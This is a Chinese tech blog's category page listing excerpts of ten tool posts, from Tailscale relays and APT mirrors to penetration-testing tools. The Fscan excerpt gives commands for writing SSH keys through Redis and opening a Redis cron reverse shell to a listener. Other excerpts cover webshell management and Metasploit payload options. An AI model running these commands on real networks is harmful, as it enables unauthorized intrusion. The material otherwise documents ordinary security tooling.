分类: 工具

10 篇文章

tailscale自建derp提高打洞效率与中继稳定性
tailscale是一款基于Wireguard的开源组网软件,可以通过服务器实现中继或打洞 打洞成功后可以直接走P2P,避免浪费服务器带宽 但是在某些情况下,使用官方服务器打洞成功率较低,而且在恶劣网络情况下,官方服务器的中继效果较差,所以我自己部署了多个derp,以实现高可用的打洞和中继服务。 官方对DerpServer的介绍 如何自定义自己的Derp 但是在这里我使用docker方便快速部署,因为机器有点多,懒得一个去装XD Derp部署 version: '3.7' services: derper: image: fredliang/derper ports: - "60080:80" - "60443:443" - "3478:34…
【TheOnlyMirror】基于反向代理的镜像源
最近在写项目,发现我要下载的东西怎么啥都被GFW了(github源码和发布文件/docker镜像/go工具链等) 镜像源没有,加速站没有,仅存几个可用的被边写边封,后来决定自己写了个反向代理的镜像站供工程使用 正文有提供给读者测试的一个小站,也可以用作小型生产环境,我自己已经完全依赖自己的镜像源了,尽可能维持稳定吧,要是炸了我服务SLA也炸了 ...
快速搭建ELK毫秒级响应数据库
关于ELK以及其优势 简单GPT一下 ELK 是 Elasticsearch、Logstash 和 Kibana 三个开源项目的首字母缩写,通常一起使用构成一个强大的日志管理和分析解决方案。下面将介绍它们各自的功能和ELK的优势: - Elasticsearch: 是一个基于 Lucene 构建的高性能搜索引擎。 主要用于全文搜索和分析。 具有高伸缩性,可以水平扩展,并且能够快速处理大量数据。 - Logstash: 是一个强大的数据处理管道工具。 能够动态地收集、处理和转发日志和事件数据。 支持多种输入、过滤、编解码和输出插件。 - Kibana: 是一个为 Elasticsearch 提供数据可视化的 Web 应用程序。 允许用户创建和分…
【运维】Wireguard+OpenVPN解决跨地区VPN的连接稳定性问题
首先我们要搞清楚一个问题,Wireguard和OpenVPN的区别在哪里 Wireguard基于UDP协议,继承于内核中,由于加密协议简单(但安全),开销较小,性能较高 OpenVPN基于TCP或UDP协议,由SSL/TLS实现身份加密,没有Wireguard效率高,但是支持多种管理方式 在实际使用上,TCP和UDP也有较大区别 TCP:可以提供更可靠的连接,因为它具有确认和重传机制,能够处理丢包和错误。适用于对数据完整性和可靠性要求较高的场景。 UDP:UDP可以提供更快的速度和较低的延迟,适用于实时应用程序和视频流等对延迟敏感的情况。UDP模式还可以避免TCP拥塞控制的限制,适用于高带宽环境 UDP在实际使用上可能会被QOS限速,但是在长…
Hyper-V与VMware的区别与共存
Hyper-V Hyper-V,代号Viridian,旧称Windows Server Virtualization,是Microsoft的本地虚拟机管理程序,它可以在运行x86-64位的Windows上创建虚拟机。从Windows 8开始,Hyper-V取代Windows Virtual PC作为Windows客户端版本的硬件虚拟化组件。可以配置运行Hyper-V的服务器计算机能够将单个虚拟机公开到一个或多个网络。Hyper-V是与Windows Server 2008一起首次发布,自Windows Server 2012和Windows 8以来一直无需额外付费。独立的Windows Hyper-V Server是免费的,但仅具有命令行接口…
APT源的工作原理
引言 最近在折腾自己学校的镜像源,看到差不多20T的硬盘都被塞满了,我是很好奇系统是如何管理这些文件的,于是顺便就研究下APT源的工作原理 原理 在Ubuntu/Debian等系统下,常见的应用安装方式为apt/apt-get 前者可以说是后者的升级版,提供了更友好的命令行界面,包含了apt-get和apt-cache等常用功能,本质上都是基于dpkg的高级包管理工具。 Ubuntu/Debian采用集中式的软件仓库机制,将各式各样的软件包分门别类地存放在软件仓库中,进行有效地组织和管理。由于网络环境的问题,我们可能无法正常访问官方的软件仓库,所以许多镜像服务器被建立,并且时刻保持与官方服务器的同步。在使用apt之前,我们一般都会进行换源处理…
【渗透工具】DNSLOG搭建
Dnslog相信渗透的都不陌生,但我只是在Apache Log4j后才意识到这东西是有多好用 但是有些时候,知名的dnslog.cn网站就会崩溃。 既然这样,干脆就自己搭一个,但是过程十分艰辛。 由于我设置了@*解析,我就不需要再对ns1.xxx.cn/ns2.xxx.cn进行解析 具体如下 然后我们就接着物色dnslog平台 一个非常古老的BugScanTeam的DNSLOG 于是乎,调了好久,6年前的代码,还要改cdn,还要改ssl(开发组历史遗留问题) 最后改完了,发现一直301,查看issue才发现要修改 SECURE_SSL_REDIRECT = False 然而,无论怎么修改数据库,还是进不去他的管理界面! 之后只好另谋出路,最后…
【渗透工具】MSFCONSOLE控制台使用和操作
Metasploit一款开源安全漏洞检测工具,其不断更新的Payload使其成为了最强大的渗透框架之一 对于MSFCONSOLE(简称MSF),就不多赘述安装部署了,对于日常渗透使用一般可以再Viper中使用。 常见参数解读: -p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < form…
【渗透工具】AntSword蚁剑
Github仓库 蚁剑官方加载器 这是一款Webshell管理的基础软件,渗透的一切都是围绕shell进行的,内置的插件也能解决一些小问题 附一张成功webshell的截图 连接密码对应webshell的POST参数
【渗透工具】Fscan
Github仓库 Fscan是一款内网综合扫描工具,以下为常用命令 fscan -h 0.0.0.0/8 (全网段扫描) fscan -h 192.168.1.1/24 (默认使用全部模块) fscan -h 192.168.1.1/16 (B段扫描) 其他用法 fscan -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) fscan -h 19…